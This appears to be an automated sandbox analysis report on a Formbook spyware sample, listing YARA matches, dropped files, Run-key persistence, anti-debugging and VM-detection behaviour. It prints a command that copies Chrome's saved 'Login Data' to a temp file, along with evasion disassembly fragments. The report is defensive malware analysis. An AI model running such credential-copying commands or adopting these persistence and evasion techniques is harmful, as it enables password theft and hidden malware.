Source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@20/6@36/13

Source: C:\Users\user\Desktop\AT113020.exe

Code function: 1_2_0042A11C GetLastError,FormatMessageA,

1_2_0042A11C

Source: C:\Users\user\Desktop\AT113020.exe

Code function: 1_2_00409576 GetDiskFreeSpaceA,

1_2_00409576

Source: C:\Users\user\Desktop\AT113020.exe

Code function: 1_2_0041A2E8 FindResourceA,

1_2_0041A2E8

Source: C:\Users\user\Desktop\AT113020.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6272:120:WilError_01

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\DB1

Jump to behavior

Source: C:\Users\user\Desktop\AT113020.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\AT113020.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\AT113020.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\explorer.exe

File read: C:\Users\user\Searches\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\AT113020.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\AT113020.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\AT113020.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\AT113020.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: AT113020.exe

ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\AT113020.exe

File read: C:\Users\user\Desktop\AT113020.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\AT113020.exe 'C:\Users\user\Desktop\AT113020.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknown	Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: unknown	Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\AT113020.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\msdt.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: AT113020.exe

Static file information: File size 1375232 > 1048576

Source:	Binary string: ieinstal.pdbGCTL source: msdt.exe, 00000008.00000002.1016655468.00000000006E4000.00000004.00000020.sdmp
Source:	Binary string: msdt.pdbGCTL source: ieinstal.exe, 00000006.00000002.293259484.0000000004C90000.00000040.00000001.sdmp
Source:	Binary string: ieinstal.pdb source: msdt.exe, 00000008.00000002.1016655468.00000000006E4000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000002.00000002.292827660.000000000352F000.00000040.00000001.sdmp, ieinstal.exe, 00000006.00000002.285564970.0000000003050000.00000040.00000001.sdmp, msdt.exe, 00000008.00000002.1020258027.000000000473F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000003.285864876.00000000028B0000.00000004.00000001.sdmp, ieinstal.exe, 00000010.00000002.293780626.000000000332F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: ieinstal.exe, msdt.exe, 00000008.00000002.1020258027.000000000473F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000003.285864876.00000000028B0000.00000004.00000001.sdmp, ieinstal.exe, 00000010.00000002.293780626.000000000332F000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdb source: ieinstal.exe, 00000002.00000002.294312378.0000000005110000.00000040.00000001.sdmp
Source:	Binary string: msdt.pdb source: ieinstal.exe, 00000006.00000002.293259484.0000000004C90000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdbGCTL source: ieinstal.exe, 00000002.00000002.294312378.0000000005110000.00000040.00000001.sdmp

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\AT113020.exe

Code function: 1_2_0048ADC8 GetBkColor,GetDC,GetROP2,GetROP2,GetBkMode,GetMapMode,VirtualAlloc,VirtualAlloc,GetDCBrushColor,LoadLibraryA,GetProcAddress,GetProcAddress,GetPolyFillMode,GetTextAlign,GetPolyFillMode,VirtualProtect,GetGraphicsMode,GetDC,GetPolyFillMode,GetDC,GetTextAlign,GetPixelFormat,GetDC,GetPixelFormat,

1_2_0048ADC8

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0048D0AC push 0048D125h; ret	1_2_0048D11D
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_004194F8 push ecx; mov dword ptr [esp], edx	1_2_004194FD
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0048D5D0 push 0048D65Dh; ret	1_2_0048D655
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00460068 push 00460094h; ret	1_2_0046008C
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0046E088 push 0046E0E2h; ret	1_2_0046E0DA
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0048C230 push 0048C256h; ret	1_2_0048C24E
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0047C358 push 0047C384h; ret	1_2_0047C37C
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0042638C push 004263B8h; ret	1_2_004263B0
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00450484 push ecx; mov dword ptr [esp], ecx	1_2_00450488
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00474568 push 004745DEh; ret	1_2_004745D6
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_004425EC push 00442638h; ret	1_2_00442630
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00488600 push 0048864Ch; ret	1_2_00488644
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0040E61A push 0040E926h; ret	1_2_0040E91E
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00430618 push 004306E8h; ret	1_2_004306E0
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0041875E push 6C0041CCh; iretd	1_2_0041877D
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_004167E8 push 0041685Eh; ret	1_2_00416856
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0040E7A0 push 0040E926h; ret	1_2_0040E91E
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00424816 push 004248C3h; ret	1_2_004248BB
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00424818 push 004248C3h; ret	1_2_004248BB
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_004268D0 push 00426913h; ret	1_2_0042690B
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_004068D2 push 0040692Fh; ret	1_2_00406927
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_004068D4 push 0040692Fh; ret	1_2_00406927
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0043A91C push 0043A95Fh; ret	1_2_0043A957
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_004729E0 push 00472A13h; ret	1_2_00472A0B
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0045CC0C push 0045CC72h; ret	1_2_0045CC6A
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00488CB8 push 00488D3Ah; ret	1_2_00488D32
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00426E80 push 00426EC3h; ret	1_2_00426EBB
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00449050 push 004490BBh; ret	1_2_004490B3
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_004390CC push 00439104h; ret	1_2_004390FC
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0040F0F0 push 0040F11Ch; ret	1_2_0040F114
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0048D144 push 0048D1ECh; ret	1_2_0048D1E4

Persistence and Installation Behavior:

Drops PE files

Source: C:\Users\user\Desktop\AT113020.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe

Jump to dropped file

Boot Survival:

Creates autostart registry keys with suspicious names

Source: C:\Users\user\Desktop\AT113020.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Accf

Jump to behavior

Creates multiple autostart registry keys

Source: C:\Windows\SysWOW64\msdt.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 7NF4IRG0T			Jump to behavior
Source: C:\Users\user\Desktop\AT113020.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Accf			Jump to behavior

Source: C:\Users\user\Desktop\AT113020.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Accf	Jump to behavior
Source: C:\Users\user\Desktop\AT113020.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Accf	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 7NF4IRG0T	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 7NF4IRG0T	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0046B900 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	1_2_0046B900
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0046C030 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,	1_2_0046C030
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0046C0F4 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,	1_2_0046C0F4
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00468398 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,	1_2_00468398
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00456848 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	1_2_00456848
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00457218 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	1_2_00457218
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_0046B900 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	5_2_0046B900
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_0046C030 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,	5_2_0046C030
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_0046C0F4 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,	5_2_0046C0F4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_00468398 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,	5_2_00468398
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_00456848 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	5_2_00456848
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_00457218 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	5_2_00457218
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_00425E44 IsIconic,GetWindowPlacement,GetWindowRect,	5_2_00425E44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_00455F40 IsIconic,GetCapture,	5_2_00455F40

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\AT113020.exe

Code function: 1_2_0045C27C SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,

1_2_0045C27C

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	RDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	RDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 00000000001483D4 second address: 00000000001483DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 00000000026183D4 second address: 00000000026183DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 000000000014876E second address: 0000000000148774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 000000000261876E second address: 0000000002618774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Code function: 2_2_004086A0 rdtsc

2_2_004086A0

Contains functionality to detect sandboxes (mouse cursor move detection)

Source: C:\Users\user\Desktop\AT113020.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,		1_2_0046AB64
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,		5_2_0046AB64

Found large amount of non-executed APIs

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	API coverage: 8.1 %
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	API coverage: 6.3 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 6532

Thread sleep time: -225000s >= -30000s

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe

Code function: 5_2_00405DBC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

5_2_00405DBC

Source: explorer.exe, 00000003.00000000.256798347.000000000891C000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.256454933.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000002.287726771.00000000008C1000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWTI8
Source: explorer.exe, 00000003.00000002.1016614721.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000003.00000000.256859188.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000003.00000000.251940786.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000003.00000000.256454933.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.256454933.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.256859188.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000003.00000000.256454933.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe

API call chain: ExitProcess graph end node

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Code function: 2_2_004086A0 rdtsc

2_2_004086A0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Code function: 2_2_00409900 LdrLoadDll,

2_2_00409900

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\AT113020.exe

1_2_0048ADC8

Contains functionality to read the PEB

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0343DB40 mov eax, dword ptr fs:[00000030h]	2_2_0343DB40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03508B58 mov eax, dword ptr fs:[00000030h]	2_2_03508B58
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0343F358 mov eax, dword ptr fs:[00000030h]	2_2_0343F358
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0343DB60 mov ecx, dword ptr fs:[00000030h]	2_2_0343DB60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03463B7A mov eax, dword ptr fs:[00000030h]	2_2_03463B7A
